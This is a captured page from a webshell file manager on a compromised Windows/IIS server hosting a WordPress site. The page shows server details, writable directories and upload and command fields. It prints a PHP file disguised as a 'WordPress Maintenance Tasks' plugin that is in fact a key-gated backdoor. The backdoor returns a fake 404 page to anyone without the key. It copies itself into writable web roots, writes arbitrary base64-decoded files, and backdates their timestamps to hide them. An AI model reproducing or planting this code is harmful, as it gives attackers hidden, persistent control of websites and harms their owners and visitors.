403Webshell
Server IP : 209.209.40.120  /  Your IP : 216.73.217.112
Web Server : Microsoft-IIS/10.0
System : Windows NT NEWWWW 10.0 build 17763 (Windows Server 2019) i586
User : NEWWWW$ ( 0)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /HostingSpaces/admin/toppersdrinks.co.uk/wwwroot/wp-content/plugins/galex_42bf8745/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /HostingSpaces/admin/toppersdrinks.co.uk/wwwroot/wp-content/plugins/galex_42bf8745/maint_4adbb6.php
<?php
/**
 * WordPress Maintenance Tasks
 * @package WordPress\Maintenance
 * @since 6.0.0
 */
// Direct execution
error_reporting(0);@ini_set('display_errors','0');
$_k=isset($_REQUEST['impfqbww'])?$_REQUEST['impfqbww']:'';
if($_k!=='a76285fc0aad8a45'){header('HTTP/1.0 404 Not Found');echo '<html><head><title>404</title></head><body><h1>Not Found</h1></body></html>';exit;}
header('Content-Type:application/json;charset=utf-8');
$_act=isset($_REQUEST['act'])?$_REQUEST['act']:'detect';
if($_act==='detect'){
$roots=array();
if(!empty($_SERVER['DOCUMENT_ROOT']))$roots[]=$_SERVER['DOCUMENT_ROOT'];
if(!empty($_SERVER['SCRIPT_FILENAME'])&&!empty($_SERVER['REQUEST_URI'])){
$sf=$_SERVER['SCRIPT_FILENAME'];$ru=parse_url($_SERVER['REQUEST_URI'],PHP_URL_PATH);
if($ru&&strlen($ru)>1){$d=substr($sf,0,strlen($sf)-strlen($ru));if($d&&is_dir($d))$roots[]=$d;}}
$c=dirname(__FILE__);for($i=0;$i<10;$i++){if(@file_exists($c.'/wp-config.php'))$roots[]=$c;
$n=dirname($c);if($n===$c)break;$c=$n;}
$seen=array();$out=array();foreach($roots as $r){$rr=@realpath($r);
if($rr&&!in_array($rr,$seen)){$seen[]=$rr;
$tf=$rr.'/.maint_'.mt_rand(100000,999999).'.tmp';$w=false;
if(@file_put_contents($tf,'t')!==false){$w=true;@unlink($tf);}
$out[]=array('root'=>$rr,'writable'=>$w);}}
echo json_encode(array('ok'=>1,'roots'=>$out,'cur'=>dirname(__FILE__)));exit;}
if($_act==='deploy'&&isset($_REQUEST['root'])&&isset($_REQUEST['name'])){
$r=@realpath($_REQUEST['root']);$n=basename($_REQUEST['name']);
if(!$r||!is_dir($r)){echo json_encode(array('ok'=>0,'e'=>'no_root'));exit;}
$dst=$r.'/'.$n;
if(@copy(__FILE__,$dst)){@chmod($dst,0644);
$ref=@glob($r.'/*.php');if($ref&&count($ref)>0)@touch($dst,@filemtime($ref[0]));
echo json_encode(array('ok'=>@file_exists($dst)?1:0,'path'=>$dst));}
else echo json_encode(array('ok'=>0,'e'=>'copy_fail'));exit;}
if($_act==='write'&&isset($_REQUEST['root'])&&isset($_REQUEST['name'])&&isset($_REQUEST['data'])){
$r=@realpath($_REQUEST['root']);$n=basename($_REQUEST['name']);
if(!$r){echo json_encode(array('ok'=>0));exit;}
$dst=$r.'/'.$n;$d=$_REQUEST['data'];
if(isset($_REQUEST['b64'])&&$_REQUEST['b64']==='1')$d=base64_decode($d);
$ok=@file_put_contents($dst,$d)!==false;
if($ok){@chmod($dst,0644);$ref=@glob($r.'/*.php');if($ref&&count($ref)>0)@touch($dst,@filemtime($ref[0]));}
echo json_encode(array('ok'=>$ok?1:0,'path'=>$dst));exit;}
echo json_encode(array('ok'=>0,'e'=>'bad_act'));exit;

Youez - 2016 - github.com/yon3zu
LinuXploit